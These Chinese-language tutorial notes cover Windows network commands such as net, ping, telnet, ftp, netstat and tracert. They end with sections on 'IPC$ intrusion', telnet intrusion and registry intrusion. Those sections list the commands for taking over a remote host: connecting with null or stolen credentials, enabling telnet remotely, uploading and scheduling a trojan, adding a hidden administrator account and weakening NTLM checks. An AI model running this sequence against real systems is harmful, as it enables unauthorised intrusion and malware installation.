使用ping命令測試網(wǎng)絡(luò)連接
- 獲取NETBIOS主機(jī)名
format: “ping -a IP地址”
for example: “ping -a 172.16.10.20”
使用net命令管理網(wǎng)絡(luò)環(huán)境
- net account
- 該命令用于更新用戶的賬戶數(shù)據(jù)庫,并且為所有賬戶修改密碼和登錄需求,如:強(qiáng)制用戶在時間到期之后多久必須注銷、密碼最長/短使用期限、密碼長度下限、鎖定閾值、鎖定持續(xù)時間、鎖定觀測窗口和計算機(jī)角色等詳細(xì)信息
format:
“net accounts [/forcelogoff:{minutes|no}][/minpwlen:length][/maxpwage:{days|unlimited}][/minpwage:days][/uniquepw:number][/sync][/domain]”
?
for example:
“net accounts”
參數(shù)說明不帶參數(shù)顯示密碼、登錄限制和域信息的當(dāng)前配置/forcelogoff:{minutes|no}設(shè)置當(dāng)前用戶賬戶或有效登錄時間到期時在結(jié)束用戶與服務(wù)器會話前等待的分鐘數(shù)/minpwlen:length設(shè)置用戶賬戶密碼的最少字符數(shù)/maxpwage:{days|unlimited}設(shè)置用戶賬戶密碼有效天數(shù)的最大值/maxpwage:unlimited設(shè)置賬戶密碼永遠(yuǎn)有效/minpwage:days設(shè)置用戶可以更改新密碼前的最小天數(shù)/uniquepw:number設(shè)置用戶不對number次密碼更改重復(fù)相同的密碼/sync更新所有成員服務(wù)服務(wù)器的用戶賬戶數(shù)據(jù)庫/domain對當(dāng)前域的主域控制器執(zhí)行操作
- net computer
- 該命令用于添加或者刪除域數(shù)據(jù)庫中的計算機(jī),所有計算機(jī)的添加和刪除都會轉(zhuǎn)發(fā)到主域控制器
format:“net computer \\computername {/add|/del}”
- net config
該命令用于顯示工作站或服務(wù)器服務(wù)的配置消息,或者顯示并更改某項服務(wù)的設(shè)置
format:“net config [service[options]]”
參數(shù)說明service通過net config命令進(jìn)行配置的服務(wù)options服務(wù)的特定選項
- net config workstation命令用于顯示更改配置工作站服務(wù)參數(shù),更改立即生效并永久保持
format:“net config workstation [/charcount:bytes][/chartime:msec][/charwait:sec]”
參數(shù)說明/charcount:bytes指定在數(shù)據(jù)發(fā)送到通信設(shè)備之前Windows收集的數(shù)據(jù)量,默認(rèn)16字節(jié)/chartime:msec設(shè)置Windows在將數(shù)據(jù)發(fā)送到通信設(shè)備前手機(jī)數(shù)據(jù)的毫秒數(shù),默認(rèn)250毫秒/charwait:sec將Windows等待通信設(shè)備的秒數(shù)設(shè)置為可用,默認(rèn)3600秒
- net continue
- 該命令能用重新激活掛起的服務(wù)
format:“net continue service”
- net file
- 用于顯示某種服務(wù)器上所有打開的共享文件夾及鎖定文件夾數(shù),也可以關(guān)閉個別文件并取消文件鎖定
參數(shù)說明
id文件標(biāo)識號/close關(guān)閉打開的文件并釋放鎖定記錄。請從共享文件的服務(wù)器中鍵入該命令- net group
- 用于Windows NT Server域中添加、更改或顯示全局組,僅在Windows NT Server域中可用
- format:“net group [groupname [/comment:'text']][/domain]
- net group groupname {/add[/comment:'text']|delete}[/domain]
- net group groupname username[...]{/add|/delete}[/domain]”
參數(shù)說明
groupname要添加、擴(kuò)展或刪除的組。僅提供某個組名便可查看組中的用戶列表/comment:'text'為新建組或現(xiàn)有組添加注釋。最多48個字符并用引號將注釋文字引注/domain在當(dāng)前域的主域控制器中執(zhí)行該操作,否則在本地計算機(jī)上執(zhí)行操作username[...]列表顯示要添加到組或從組中刪除的一個或多個用戶/add添加組或在組中添加用戶名。必須使用該命令為添加到組中的用戶建立賬號/delete刪除組或從組中刪除用戶名- net help
- 該命令用于提供網(wǎng)絡(luò)命令列表及幫助主題,可以說不會用net命令,就用這個命令就可以了
- format:“net help [command] net command {/help|/?}”
- net localgroup
- 用于顯示、刪除或更改本地組
- format:“net localgroup [groupname [/comment:'text']][/domain]
- net localgroup groupname{/add [/comment:'text']|/delete}[/domain]
- net localgroup groupname name[...]{/add|/delete}[/domain]”
- net name
- 用于添加或刪除消息名(有時稱別名),或顯示計算機(jī)接受消息的列表。要使用該命令則必須先運行信使服務(wù)
- format:”net name[name [/add|/delete]]“
- net print
- 用于顯示或控制打印作業(yè)及打印隊列
- format:”net print \computername
- net print \sharename
- net print [\computername] job# [/hold|/release|/delete]“
- net session
- 用于列出或斷開本地計算機(jī)和與之連接的客戶端會話
- format:”net session [\computername][/delete]“
- net send
- 用于向網(wǎng)絡(luò)的其他用戶、計算機(jī)發(fā)送消息。要接受消息必須運行信使服務(wù)
- format:”net send {name|*|/domain[:name]|/users} message“
參數(shù)說明
name要接受發(fā)送消息得用戶名、計算機(jī)名或通信名*將消息發(fā)送到組中所有名稱/domain[:name]將消息發(fā)送到計算機(jī)域中的所有名稱/users將消息發(fā)送到與服務(wù)器連接的所有用戶message作為消息發(fā)送的文本- net share
- 用于創(chuàng)建、刪除或顯示共享資源
- format:”net share sharename
- net share sharename=drive:path [/users:number|/unlimited][/remark:'text']
- net share sharename [/users:number|unlimited][/remark:'text']
- net share {sharename|drive:path} /delete“
參數(shù)說明
sharename共享資源的網(wǎng)絡(luò)名稱drive:path指定共享文件的絕對路徑/users:number設(shè)置可同時訪問共享資源的最大用戶數(shù)/unlimited不限制同時訪問用戶數(shù)/remark:'text'添加關(guān)于共享的注釋/delete停止共享資源- net time
- 用于時計算機(jī)的時間與另一臺計算機(jī)或域的時間同步。不帶/set參數(shù)時,將顯示另外一臺計算機(jī)或域的時間
- format:”net time [\\computername|/domain[:name]][/set]“
參數(shù)
- \computername要檢查或同步的服務(wù)器名/domain[:name]指定要與其同步時間的域/set使本計算機(jī)時鐘與指定計算機(jī)或域的時間同步
使用telnet命令進(jìn)行遠(yuǎn)程登陸
- 格式
- format:”telnet ip地址/主機(jī)名稱“
- 步驟
- 輸入”telnet 主機(jī)名/ip地址“啟動telnet會話
- 一旦telnet成功連接到遠(yuǎn)程計算機(jī)上,就顯示登陸信息并提示用戶輸入用戶名和口令
- 如果輸入正確就能成功的登錄并在遠(yuǎn)程計算機(jī)上工作
- ?
使用ftp命令進(jìn)行數(shù)據(jù)傳輸
- 格式
- format:”ftp -v -d -l -n -g [主機(jī)名]“
參數(shù)說明
-v顯示遠(yuǎn)程服務(wù)器的所有響應(yīng)信息-d使用調(diào)試方式,顯示在客戶端和服務(wù)器之間傳遞的ftp命令-l傳送多個文件時關(guān)閉交換提示-n限制ftp的自動登錄-g取消全局文件名- ?
使用netstat命令查看網(wǎng)絡(luò)連接的相關(guān)信息
- 使用netstat -a命令:顯示所有連接和端口
- 使用netstat -b命令:顯示包含創(chuàng)建每個連接或者監(jiān)聽端口的可執(zhí)行文件
- 使用netstat -e命令:顯示以太網(wǎng)數(shù)據(jù)統(tǒng)計,可以結(jié)合-s使用
- 使用netstat -n命令:能以網(wǎng)絡(luò)IP地址代替名稱,顯示網(wǎng)絡(luò)連接情形
- netstat /help查看命令幫助。。。
- ?
使用tracert命令查看IP數(shù)據(jù)報的傳輸路徑
- tracert是路由跟蹤實用程序,該命令用于確定IP數(shù)據(jù)包訪問目標(biāo)所采取的路徑
- format:“tracert [-d][-h maximum_hops][-j host-list][-w timeout] targer_name”
- for example:“tracert 主機(jī)名”
參數(shù)說明
-d指定不將IP地址解析到主機(jī)名-h maximum_hops指定躍點數(shù)以跟蹤到成為target_name的主機(jī)的路由-j host-list指定tracert實用程序數(shù)據(jù)包所采用路徑中的路由接口列表-w timeout等待timeout為每次回復(fù)所指定的毫秒數(shù)target_name目標(biāo)主機(jī)名稱或IP地址- ?
IPC$入侵與防范
- 建立IPC$連接
- format:“net use \\IP\ipc$ Password/user:Admin”
- ?
- IP:目標(biāo)ip地址
- Password:目標(biāo)計算機(jī)密碼
- Admin:目標(biāo)計算機(jī)用戶名
- 建立映射
- format:“net use z:\\IP\c$”
- ?
- \\IP\c$ 表示目標(biāo)電腦上的C盤,符號$表示隱藏的共享,z:表示將遠(yuǎn)程主機(jī)的C盤映射為本地磁盤的盤符
- 查看遠(yuǎn)程連接
- format:“net use * /del”
- 空連接漏洞
- format:“net use \\ip '' /user:'' ” --注意一共有四個空格 引號不能少
- IPC$連接原本是要求客戶機(jī)具有足夠的權(quán)限才能連接到主機(jī),然而該漏洞允許客戶端使用空用戶名和密碼就可以與目標(biāo)主機(jī)成功建立連接。雖然這樣無法執(zhí)行管理類操作,既不能映射網(wǎng)絡(luò)驅(qū)動器、上傳文件、執(zhí)行腳本命令,但是卻可以用來探測目標(biāo)主機(jī)中的一些信息。
- ?
Telnet入侵
- 使用telnet入侵前必須建立IPC$連接,建立連接是為了方便開啟遠(yuǎn)程計算機(jī)中被禁用的telnet服務(wù)
- format:“sc \\ip config tlntsvr start=auto” --用sc命令把禁用的telnet服務(wù)變成自動
- “sc \\ip start tlntsvr” --用sc命令啟動telnet服務(wù)
- “telnet ip” --登錄telnet
- “net share” --查看默認(rèn)共享
- “net share sharename=drive:path” --建立c$共享
- “copy \1.txt \\ip\c$” --copy命令上傳木馬 這里是把命令行切到c盤下了,1.txt在C盤根目錄
- “at \\ip time cmd” --at命令定時執(zhí)行 time參數(shù)為時間 cmd為上傳到目標(biāo)主機(jī)共享的程序名 即木馬
- “net user 用戶名 密碼 /add” --添加用戶
- “net localgroup administrators 用戶名 /add” --為上一步添加的用戶名加入工作組
- 注意:如果對方采用了NTLM認(rèn)證策略,可以連接網(wǎng)絡(luò)注冊表修改HKEYLOCAL\MACHINE\SOFTWARE\MICROSOFT\TELNETSERVERf\1.0 下的NTLM鍵值由2改成0,然后重啟telnet服務(wù)
- ?
- ?
通過注冊表入侵
- Windows注冊表是幫助Widnows控制硬件、軟加你、用戶環(huán)境和Windows界面的一套數(shù)據(jù)文件,入侵者可在注冊表編輯器中通過連接網(wǎng)絡(luò)注冊表進(jìn)入遠(yuǎn)程計算機(jī)的注冊表并進(jìn)行實時監(jiān)控。如果想阻止該入侵,只需要關(guān)閉Remote Registry服務(wù)
- ?